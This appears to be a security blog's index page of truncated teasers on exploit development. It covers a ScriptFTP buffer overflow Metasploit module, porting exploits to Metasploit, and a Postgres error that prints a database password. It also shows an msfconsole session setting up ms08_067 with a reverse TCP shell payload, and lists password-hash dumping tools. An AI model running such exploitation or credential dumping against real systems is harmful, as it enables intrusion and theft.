ScriptFTP <=3.3 Remote Buffer Overflow Exploit (MSF)
You might be read about the previous post ScriptFTP Remote BOF, if you are a Metasploit user, you can add this exploit module to your Metasploit Framework. UPDATE: Metasploit has released their module for ScriptFTP. You can use it now on Metasploit. Thanks to: Cyberheb < mrs[at]infosec-id.com > Otoy < otoy[at]digital-echidna.org > TecR0c < roccogiovannicalvi[at]gmail.com > mr_me < steventhomasseeley[at]gmail.com...
read morePorting Your Exploit to Metasploit
Beberapa waktu yang lalu saya udah memberikan tutorial basic exploit development (direct return technique) dan exploit development berbasis SEH. Sekarang mari kita porting exploit tersebut ke Metasploit Framework agar exploit tersebut semakin reliable dan bisa menggunakan macam-macam payload, fitur-fitur canggih yang ada di Metasploit. Kita akan meng-konversi exploit yang pertama, yaitu Free CD to MP3 Converter. Sebelum itu, kita kumpulkan poin-poin penting yang membuat exploit tersebut berjalan dengan baik, seperti berikut: junk = "\x41" * 4112 # jumlah sampah yang...
read moreMSF Postgres Problem on BT5
If you read this post then I bet you have the same problem with me. When I tried to run the msfconsole on my BT5 I have this buggy information. [-] Failed to connect to the database: could not connect to server: Connection refused Is the server running on host “127.0.0.1″ and accepting TCP/IP connections on port 7175? {“adapter”=>”postgresql”, “database”=>”msf3″, “username”=>”msf3″, “password”=>”7z878914″, “host”=>”127.0.0.1″,...
read moreMetasploit Meterpreter Command Shell Upgrade
Seeing is believing (look at the orange colored, that’s what I type) root@bt:~# msfconsole =[ metasploit v3.8.0-dev [core:3.8 api:1.0] + — –=[ 707 exploits - 359 auxiliary - 57 post + -- --=[ 225 payloads - 27 encoders - 8 nops =[ svn r13065 updated today (2011.06.29) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp payload => windows/shell_reverse_tcp msf exploit(ms08_067_netapi) > set lhost 192.168.96.1 lhost => 192.168.96.1 msf exploit(ms08_067_netapi) > set rhost 192.168.96.129 rhost...
read moreDump Windows System Info
When you were asked to collect all Windows system information such as list of users, services, software installed and its version, Windows update history, etc..probably you wanted to see these tools: System Information Collector WinUpdatesList v1.31 WinAudit Freeware v2.28.2 SAM/Password Extractor pwdump7* ( v7.1 ) (detected as HackTool/Possible Unwanted Application) FGDump* (detected as HackTool/Possible Unwanted Application) Offline NT Password & Registry Editor by Petter Nordahl-Hagen (must be done in offline mode/reboot the system) [stextbox id="info"]If you familiar with reverse...
read more